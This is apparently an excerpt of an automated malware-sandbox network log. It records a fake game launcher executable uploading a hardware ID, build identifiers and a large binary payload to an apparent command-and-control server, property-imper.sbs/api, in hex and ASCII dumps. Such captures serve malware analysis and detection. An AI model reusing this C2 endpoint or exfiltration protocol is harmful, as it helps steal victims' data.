                                                                                              2024-11-23 14:06:06 UTC8752OUTData Raw: 2d 2d 33 4a 44 46 52 56 33 4f 47 33 59 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 41 30 37 38 46 44 31 30 37 41 41 33 42 37 43 33 44 39 42 42 44 38 46 42 31 46 42 34 35 33 0d 0a 2d 2d 33 4a 44 46 52 56 33 4f 47 33 59 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 4a 44 46 52 56 33 4f 47 33 59 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 73 61 73 63 68 6b 61 71 0d 0a 2d 2d 33 4a 44 46 52 56 33 4f 47 33
                                                                                              Data Ascii: --3JDFRV3OG3YAContent-Disposition: form-data; name="hwid"8DA078FD107AA3B7C3D9BBD8FB1FB453--3JDFRV3OG3YAContent-Disposition: form-data; name="pid"2--3JDFRV3OG3YAContent-Disposition: form-data; name="lid"BVnUqo--@saschkaq--3JDFRV3OG3
                                                                                              2024-11-23 14:06:07 UTC1015INHTTP/1.1 200 OK
                                                                                              Date: Sat, 23 Nov 2024 14:06:07 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=51c0derht0k64pt8hacfvuv176; expires=Wed, 19-Mar-2025 07:52:45 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DFPvll9vswvtaE7c629Ts6Zh3S3B3in4igdr3fJOs2Sp0qLaPnxmDX54xOwmNRkE6OnEzEhJ2UkQ3boKVQXX2%2FsBlOAdJt4Mqvhfkx8ojKRQfOj5Msd%2BOa980AbZ%2Bnhz4jPEL8o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8e71b7cbcb538c4b-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2027&sent=9&recv=13&lost=0&retrans=0&sent_bytes=2846&recv_bytes=9687&delivery_rate=1557333&cwnd=252&unsent_bytes=0&cid=ab8984f8914484bc&ts=767&x=0"
                                                                                              2024-11-23 14:06:07 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                              Data Ascii: eok 8.46.123.75
                                                                                              2024-11-23 14:06:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.449734104.21.33.1164437328C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-11-23 14:06:08 UTC281OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=MKVFJJNDBTQSO0J
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 20423
                                                                                              Host: property-imper.sbs
                                                                                              2024-11-23 14:06:08 UTC15331OUTData Raw: 2d 2d 4d 4b 56 46 4a 4a 4e 44 42 54 51 53 4f 30 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 41 30 37 38 46 44 31 30 37 41 41 33 42 37 43 33 44 39 42 42 44 38 46 42 31 46 42 34 35 33 0d 0a 2d 2d 4d 4b 56 46 4a 4a 4e 44 42 54 51 53 4f 30 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4d 4b 56 46 4a 4a 4e 44 42 54 51 53 4f 30 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 73 61 73 63 68 6b 61 71 0d 0a 2d 2d 4d
                                                                                              Data Ascii: --MKVFJJNDBTQSO0JContent-Disposition: form-data; name="hwid"8DA078FD107AA3B7C3D9BBD8FB1FB453--MKVFJJNDBTQSO0JContent-Disposition: form-data; name="pid"3--MKVFJJNDBTQSO0JContent-Disposition: form-data; name="lid"BVnUqo--@saschkaq--M
                                                                                              2024-11-23 14:06:08 UTC5092OUTData Raw: 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: M?lrQMn 64F6(X&7~`aO
                                                                                              2024-11-23 14:06:09 UTC1015INHTTP/1.1 200 OK
                                                                                              Date: Sat, 23 Nov 2024 14:06:09 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=h1hrg2n38dgk6gumau7jaejia4; expires=Wed, 19-Mar-2025 07:52:48 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BNaXj4Trg8Ey3uZrlHMql191nK%2BmVSrdLrN5eRVGXoKa8If0lOXUXDMlVp0V7q5BQLHs0cqS2ztpCtZpgUzH2ZqdhlDXSP%2BRczegoxmpdxTysVv6fRS0tvL6QdKyMmTzlH5IQfQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8e71b7d98a785e82-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1597&sent=13&recv=25&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21384&delivery_rate=1771844&cwnd=216&unsent_bytes=0&cid=76cefae6ab2a3d3b&ts=905&x=0"
                                                                                              2024-11-23 14:06:09 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                              Data Ascii: eok 8.46.123.75
                                                                                              2024-11-23 14:06:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.449735104.21.33.1164437328C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-11-23 14:06:11 UTC274OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=BNQFUY8T3
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1214
                                                                                              Host: property-imper.sbs
                                                                                              2024-11-23 14:06:11 UTC1214OUTData Raw: 2d 2d 42 4e 51 46 55 59 38 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 41 30 37 38 46 44 31 30 37 41 41 33 42 37 43 33 44 39 42 42 44 38 46 42 31 46 42 34 35 33 0d 0a 2d 2d 42 4e 51 46 55 59 38 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 4e 51 46 55 59 38 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 73 61 73 63 68 6b 61 71 0d 0a 2d 2d 42 4e 51 46 55 59 38 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                              Data Ascii: --BNQFUY8T3Content-Disposition: form-data; name="hwid"8DA078FD107AA3B7C3D9BBD8FB1FB453--BNQFUY8T3Content-Disposition: form-data; name="pid"1--BNQFUY8T3Content-Disposition: form-data; name="lid"BVnUqo--@saschkaq--BNQFUY8T3Content-
                                                                                              2024-11-23 14:06:11 UTC1022INHTTP/1.1 200 OK
                                                                                              Date: Sat, 23 Nov 2024 14:06:11 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=3qukkrp58pjigqdgsc6ah14lld; expires=Wed, 19-Mar-2025 07:52:50 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A3t3zTro%2BhcWDi0kkQWn7pd9DqFLVaxe09Xv%2FOQlRP%2BfwlBEE%2Bj39FyCiSbj73iTnWcyAGaY9ccad%2BT4tzgIb8RFcWooZM62LR0HBPRMEVGE2KdR4y%2Fqb5TFGJCf%2BfuhmlOlkf4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8e71b7e94a8643c2-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2546&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2124&delivery_rate=1133540&cwnd=134&unsent_bytes=0&cid=1ac5cce17ed0b3ac&ts=751&x=0"
                                                                                              2024-11-23 14:06:11 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                              Data Ascii: eok 8.46.123.75
                                                                                              2024-11-23 14:06:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.449736104.21.33.1164437328C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-11-23 14:06:13 UTC282OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=G2MCMEH5ENA9DZQ
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 587545
                                                                                              Host: property-imper.sbs
                                                                                              2024-11-23 14:06:13 UTC15331OUTData Raw: 2d 2d 47 32 4d 43 4d 45 48 35 45 4e 41 39 44 5a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 41 30 37 38 46 44 31 30 37 41 41 33 42 37 43 33 44 39 42 42 44 38 46 42 31 46 42 34 35 33 0d 0a 2d 2d 47 32 4d 43 4d 45 48 35 45 4e 41 39 44 5a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 32 4d 43 4d 45 48 35 45 4e 41 39 44 5a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 73 61 73 63 68 6b 61 71 0d 0a 2d 2d 47
                                                                                              Data Ascii: --G2MCMEH5ENA9DZQContent-Disposition: form-data; name="hwid"8DA078FD107AA3B7C3D9BBD8FB1FB453--G2MCMEH5ENA9DZQContent-Disposition: form-data; name="pid"1--G2MCMEH5ENA9DZQContent-Disposition: form-data; name="lid"BVnUqo--@saschkaq--G
                                                                                              2024-11-23 14:06:13 UTC15331OUTData Raw: e2 4a d6 f5 18 49 bd 7a 8c 8a 9f 15 65 71 f9 73 1f d4 29 b3 63 11 d8 bb aa a2 05 85 28 d1 19 35 f4 2d 4c 00 1c 0e fb 3c 0d 50 b9 8b d2 2e 7b f3 5b 12 8d 73 df dd a6 ad ed 18 90 8f f7 af 40 33 ea e6 ff 0a 8c 88 70 c6 f4 4d 71 4c d2 78 16 9a 84 0c 0b a2 cc 5d 20 2e 3f ad 33 56 e5 30 a6 3f fc 62 ce d8 60 41 02 7c 8b 14 4e 98 10 03 97 a4 33 cc c3 a0 b9 a5 12 9f 7a 3b 19 7f 85 25 bb c8 e3 61 89 55 d2 13 b6 02 de 35 3b 72 d0 f1 51 e2 c4 56 32 ca 38 ae c3 29 26 3a 75 23 cb 22 90 2d ba eb c0 c9 f3 47 5c 6a f8 f6 51 f3 34 9e f0 35 e9 a4 7b 0a da aa 30 7d f1 b7 24 81 62 d8 7c b3 23 04 b7 1f f7 77 0e c8 1a 2e 78 ee 3d 69 f1 cb 7f ac f6 0c 06 a8 fc ae c9 60 17 61 16 ad ec 83 d2 b7 c6 ca 27 a5 00 02 9d 87 92 19 77 0e 25 4b 00 c5 1f 50 46 3d cc 38 e1 ca 74 15 02 a7 0f
                                                                                              Data Ascii: JIzeqs)c(5-L<P.{[s@3pMqLx] .?3V0?b`A|N3z;%aU5;rQV28)&:u#"-G\jQ45{0}$b|#w.x=i`a'w%KPF=8t
                                                                                              2024-11-23 14:06:13 UTC15331OUTData Raw: bb 4f 76 b5 a9 1a a1 db ef c8 f8 e0 38 2c 8e 2b 44 68 95 04 17 7b ca 32 ad 31 b5 6e 54 d8 34 4e d8 b4 32 af 95 5c 6b ac 86 19 35 38 ae 17 67 fc 6f cf 32 ad 39 dc 26 7c f6 b5 4d 6e ae 38 44 dd 41 88 97 8c 9a dc 8e ba f1 78 2a 62 f9 c9 48 c9 93 1b 55 fd 43 b7 06 68 65 53 6c 72 bb 94 a0 97 24 38 db 3b b8 2e 77 64 ea 2c 4f 23 1e 3e fd d0 9d e5 2d 01 98 5b 8a 95 fd 25 bc 43 eb ec da 6b 10 41 97 51 d3 fb c8 bc 53 90 59 d8 6a 52 0e 65 bf a2 3f f2 61 3e 32 b0 f6 5f d1 62 08 00 19 4f dc b8 17 b3 40 00 c4 b2 91 4a 5a c8 93 03 f9 22 f3 f3 10 53 4b 00 34 ff ce 5e 90 ca 39 f2 fb 5d ec 02 aa 68 3a d2 89 8a e5 61 2d 62 9f 87 d2 28 02 55 71 7a 7d 18 80 5a ea 98 ca f2 e7 ed 9b 59 7f e3 c9 37 5e 2e d7 02 04 af 92 ce 02 b3 bd d4 1c ac 9e 2e be bd 21 52 f2 f7 b3 ac fc 94 90
                                                                                              Data Ascii: Ov8,+Dh{21nT4N2\k58go29&|Mn8DAx*bHUCheSlr$8;.wd,O#>-[%CkAQSYjRe?a>2_bO@JZ"SK4^9]h:a-b(Uqz}ZY7^..!R
                                                                                              2024-11-23 14:06:13 UTC15331OUTData Raw: 3f 41 25 07 35 47 fb d2 ca f4 98 48 8a 04 ff 41 f5 fd 6b bd c9 81 7c b0 4a 51 a8 cb f9 92 37 fd d1 19 e6 72 ce 96 ab cb ba da 60 15 27 09 3e 38 a9 d7 0f 8a 0c a6 79 c0 da 6f fd 57 e4 f9 11 fe 9f 14 aa 3b 74 82 6c c8 32 23 39 c8 82 69 cf 68 85 34 44 af 0a db 4b 81 4e e4 69 fa ed e7 9d bc 85 9d ce 77 fc 6d 76 4e e4 0e db c6 f4 04 e8 55 a7 a9 c8 27 c2 37 01 28 9f 8e b4 67 cf a7 08 6a d8 7f c5 2b 4b 0a 8b f7 89 3b c5 1a 23 ff b1 b6 65 ed 47 47 ca fe 5a 94 e3 33 b3 2f df b7 e1 db 65 9c 40 b1 eb 36 8b 6f ad 56 6f 7a 27 58 6e fc b5 e7 eb 48 53 99 db 49 76 ac 5b b7 0d 93 9b c6 7a be d0 92 aa 00 d2 3a f2 e3 9c 90 0c 1f 90 88 c9 1f 57 d9 8d f6 c0 0b 47 e4 84 5c e6 f9 03 4e 82 02 16 ef ec 61 a3 5e 09 70 dc f4 cb e7 40 e0 17 66 bb a7 7f f6 34 c0 e4 7a 0c c6 cf bd bf
                                                                                              Data Ascii: ?A%5GHAk|JQ7r`'>8yoW;tl2#9ih4DKNiwmvNU'7(gj+K;#eGGZ3/e@6oVoz'XnHSIv[z:WG\Na^p@f4z
                                                                                              2024-11-23 14:06:13 UTC15331OUTData Raw: 82 7c 6e 6c e5 bb 81 c7 04 07 4c 91 9f 49 88 dc 46 76 4d 6b b1 1e 27 7b 88 87 5b 02 cb 42 79 82 1c 94 9f 3d 71 a8 0b 1b 42 9d b8 57 d1 2f 9b 1c 19 87 0d bb 44 ca 4e 23 7f 10 d5 29 bb 2b de ad 2c d8 a0 e9 d0 f8 20 ef 59 8a 8d 5b 41 25 9f f0 e0 0f d1 36 ca c7 a8 93 6e cf 43 f8 87 f7 09 e1 0f e6 4e 70 b5 59 68 17 74 71 34 4b cd c2 ae a2 66 8f e2 d7 79 3f d7 8f 33 79 47 a5 3c c1 07 04 82 12 2c 24 20 07 64 70 5c ec 28 b3 e3 76 07 87 fa eb 06 f7 cf 10 97 5f 62 d0 94 0c c7 7c 8a 47 b9 73 96 00 09 8d 2c 41 80 82 10 70 1b b0 ed 77 ac 8e d2 79 63 19 c2 ff 56 10 d3 78 40 8e 25 55 fb ef 52 e2 2a 35 36 6e b9 c2 fe 0a 6b 07 02 59 b3 a0 44 5a 9b 7c 8d 1d df d9 70 3b 7a e1 1b 1f e8 43 06 3c d8 2c 93 06 5e 2f d8 33 fc 19 27 fb 3f 54 4e e3 11 d7 01 9b a0 20 5a 20 f7 93 27
                                                                                              Data Ascii: |nlLIFvMk'{[By=qBW/DN#)+, Y[A%6nCNpYhtq4Kfy?3yG<,$ dp\(v_b|Gs,ApwycVx@%UR*56nkYDZ|p;zC<,^/3'?TN Z '
                                                                                              2024-11-23 14:06:13 UTC15331OUTData Raw: 34 5f 17 01 8c 3a 28 bd 41 7e 14 d7 c2 5c 8a f2 a8 e3 48 55 ed d3 cc d4 5a 45 8b 0a 45 2c 3a 0d 01 da 05 78 38 c6 44 24 18 2d 91 72 8f ba a7 4f 2d bc eb 56 02 cc d3 f0 fd 1f 83 e4 b1 db 25 d3 1b 52 62 79 a1 8b a4 77 c4 fc b4 c7 6c 63 ea 6e 7c 8d 56 7f 85 af db da d6 6c 91 99 c3 31 ef 7b 81 35 5c fb 52 bf 8e 28 8f 1e ef 0f c7 ab 0f 72 fe 2e 65 cd 49 23 b9 f5 37 4f 84 d6 dd 2e a0 36 cd b4 e6 39 0f ed 05 f4 56 fd 88 09 ba 02 91 9e c9 5b 7a 9a d1 86 62 7f 8b e5 32 9a 4d 6a e6 d2 8d f4 eb 8a 06 f8 7e 7f 45 83 92 2f c4 84 c1 2c 11 b2 12 7a 0a cb c4 12 f2 c7 22 38 13 68 be 8b 57 9f a6 f9 dc 3d 55 3c 20 f6 20 92 59 72 dd 6d 0f e5 df c2 3e 9d 77 b2 3e c0 56 18 87 c5 c2 23 05 c1 3a 4b 3c 3c b5 7d 82 ec 9b 62 42 71 11 3f 77 1d 80 72 07 d9 9f f0 5f 4e 2c 6e 56 4f c3
                                                                                              Data Ascii: 4_:(A~\HUZEE,:x8D$-rO-V%Rbywlcn|Vl1{5\R(r.eI#7O.69V[zb2Mj~E/,z"8hW=U< Yrm>w>V#:K<<}bBq?wr_N,nVO
                                                                                              2024-11-23 14:06:13 UTC15331OUTData Raw: a0 96 ba b0 5a 2f 14 66 d8 b9 e3 6d 92 d1 ed fb 71 15 d8 26 17 e7 d3 69 e4 94 25 cb 49 d6 15 b7 da 37 86 5d 2a f4 dc 25 03 ce 6f 2c 47 46 07 a9 1c 7b 47 6b 7c 11 b5 d1 b1 99 b7 40 32 31 0e 7f 39 05 d0 31 2a a0 8b a9 11 13 10 65 e4 cd 78 81 4a a1 14 9b cf 80 2e c6 14 10 3c 0a 1c 52 b3 e0 81 20 68 ba ca 99 9a 52 99 b3 8e cb 36 31 32 cc 13 a2 a9 02 32 64 48 23 21 c9 05 1d 08 db bb ae c4 6f 26 3e 01 f7 18 b6 68 13 62 f3 4f c2 a4 d8 e9 f1 5a 71 40 84 32 a3 43 e2 df 2b 96 f6 1a 1b 45 19 09 f0 80 80 f2 82 56 c3 9b 1f b5 c7 90 a7 b5 b3 4c c8 19 b3 ee b9 0d 31 f1 78 56 b0 c5 40 d4 90 e2 37 cd 9f 62 04 93 da 5d fd d5 ed 28 6d 18 4f a2 7b 91 64 9a 21 06 b2 7d 13 3e 65 b4 77 16 f9 59 96 9c 99 30 fa b2 d0 34 6c 47 09 40 60 d4 0e c5 08 9c 48 96 00 f6 53 79 42 0d b2 22
                                                                                              Data Ascii: Z/fmq&i%I7]*%o,GF{Gk|@2191*exJ.<R hR6122dH#!o&>hbOZq@2C+EVL1xV@7b](mO{d!}>ewY04lG@`HSyB"
                                                                                              2024-11-23 14:06:13 UTC15331OUTData Raw: b1 20 ec cb 3d bb cd c4 ba a1 8f 50 60 9e 93 4d 05 4a c6 dd b1 f8 39 b4 a3 97 b5 50 87 6f 3f fd ec 5e 82 42 cc 16 dd 75 61 d8 ee 4b ed e3 92 27 6d dc ef ff 20 a5 91 84 cc ea d3 99 a1 07 b2 f8 9b 46 f7 e5 36 b8 21 21 1f 5e 06 7f 50 97 fa 66 4b 50 ad 7e 1b 77 0c f5 85 21 c0 f9 72 68 b3 60 6f e6 01 53 e9 20 a3 d5 db ec 41 ac 38 69 51 df d2 93 cb 7e bf 17 65 d0 d0 28 67 f9 bd 24 63 f8 81 fb de 91 ff 26 eb 36 4f 66 72 2a 43 79 58 e1 ef 9e 71 4e f4 87 e1 73 9f c3 26 7e 8c 86 57 1f f4 b1 1c b1 0d 53 ea 9d 5c f8 85 03 88 3d 9b 65 46 4b f7 c7 64 db c6 15 23 26 2d 9d 32 da 82 27 6f 6c 1e 60 9c aa e1 96 32 f4 96 ca ab ab a9 a3 4c 40 3e 9e 6d 38 15 56 c3 ec e3 0e d6 0f 87 b7 1e f8 ed 94 ac f6 64 96 5a 7b 2a 44 88 f4 bd 5a b8 d9 dd 70 d3 7f 73 15 ad 89 a3 05 0d 26 8d
                                                                                              Data Ascii: =P`MJ9Po?^BuaK'm F6!!^PfKP~w!rh`oS A8iQ~e(g$c&6Ofr*CyXqNs&~WS\=eFKd#&-2'ol`2L@>m8VdZ{*DZps&
                                                                                              2024-11-23 14:06:13 UTC15331OUTData Raw: 2a 46 67 ad e7 86 22 f5 03 28 ea 97 65 b4 47 20 aa ad f6 12 67 00 91 bb ca 18 ed f1 e4 aa ab 80 38 5a b8 97 f3 f8 ef 18 1a 2a c2 20 09 6e b9 36 ae 55 c5 7a 0b 5a 49 b6 10 e0 5d 0f b2 ea 22 5c a4 eb 69 25 6b e2 19 c9 2f 6f b0 5e f0 15 5d 34 4d 5d 62 bf d3 ac d3 43 cc e8 fd 72 a6 80 30 69 d6 de 51 ee 33 51 7b 35 bd e6 32 52 e8 8f 52 51 6a 5f a7 c5 61 97 ce f9 f3 1c 76 05 03 33 5f c9 f8 cd cf 06 e4 7a ba f6 e4 d7 a5 d3 43 e6 37 3f 06 5f b5 22 b2 d6 a5 22 9d 0b 32 cd e8 52 d0 6f 36 29 01 b3 a9 53 64 0a bf 1f 3f aa 58 19 1d 9e 06 b9 75 29 54 0d 86 0f fe 80 34 90 ed b5 77 8b 39 d4 d3 9a 71 a1 f8 6a ca 17 28 8f 61 2d 07 47 21 f8 c4 f0 35 33 0d 5c 1c 3c 19 e3 fb 13 91 16 09 7b 70 3a ec 35 72 aa 94 38 45 36 36 ac b5 73 30 0f f8 be de a0 5d ca c6 22 cf 81 27 07 29
                                                                                              Data Ascii: *Fg"(eG g8Z* n6UzZI]"\i%k/o^]4M]bCr0iQ3Q{52RRQj_av3_zC7?_""2Ro6)Sd?Xu)T4w9qj(a-G!53\<{p:5r8E66s0]"')
                                                                                              2024-11-23 14:06:13 UTC15331OUTData Raw: f4 ec 23 69 2a 0b 63 1d e0 34 b2 27 30 fc 49 39 ad 66 84 63 9f 6f 38 80 43 f7 fb 7f 83 ca a6 4b cd 2f c5 db 57 13 0b 87 f0 b2 91 c5 45 4f f6 a0 58 92 5b 7b 1b 91 75 07 8e 85 bc 21 89 86 74 3f a4 2d 0c e4 3e a6 14 8d ee 59 b6 c1 cf b7 42 b5 0f bd 06 df 54 b1 1a ae 65 86 d4 65 76 81 ee be 83 cf aa 5d 86 40 58 37 01 03 26 22 27 67 1f f2 0b 1a 01 83 4f 5f 79 bb 04 ea 02 8e d9 2f cd e9 d4 87 cb 91 4b 73 08 5f 62 5d f5 b2 78 5b 79 cc 33 1c bc 65 d7 e1 aa 58 c5 ce b7 b5 0f 42 87 42 98 79 bb 79 4e 30 cc ed 32 fd d7 ae 60 fa 7f 25 29 41 d5 4d a4 12 e8 68 a5 24 6a ae 41 1f da aa 99 26 21 8c f8 a0 ad 8a da 39 56 ab d0 bc fa cf ed e6 53 5f bd 55 10 f1 52 f4 d2 ce 75 d8 8f f7 92 5c 91 55 7f 44 fc d2 1f 88 13 9a 71 e1 52 40 36 cb 71 42 fe 09 83 b5 31 d2 aa 30 5b 81 51
                                                                                              Data Ascii: #i*c4'0I9fco8CK/WEOX[{u!t?->YBTeev]@X7&"'gO_y/Ks_b]x[y3eXBByyN02`%)AMh$jA&!9VS_URu\UDqR@6qB10[Q
                                                                                              2024-11-23 14:06:16 UTC1021INHTTP/1.1 200 OK
                                                                                              Date: Sat, 23 Nov 2024 14:06:16 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=p305vhth6l2rkgvglhde7dc3it; expires=Wed, 19-Mar-2025 07:52:54 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Df3LDfEeOZCaPV0tO%2F36KVGwR%2Bbk3A6AALyo5whhfgOv00GBVZOGcA8wCBeZ3cPFOHVFps5RW7L2jbAPn6FccbHj6EjxshSWZp9YXJZaXaN5%2Fsck6pukCv64NzzMyzAzmNGhA6k%3D"}],"group":"cf-nel","max_age":604800}
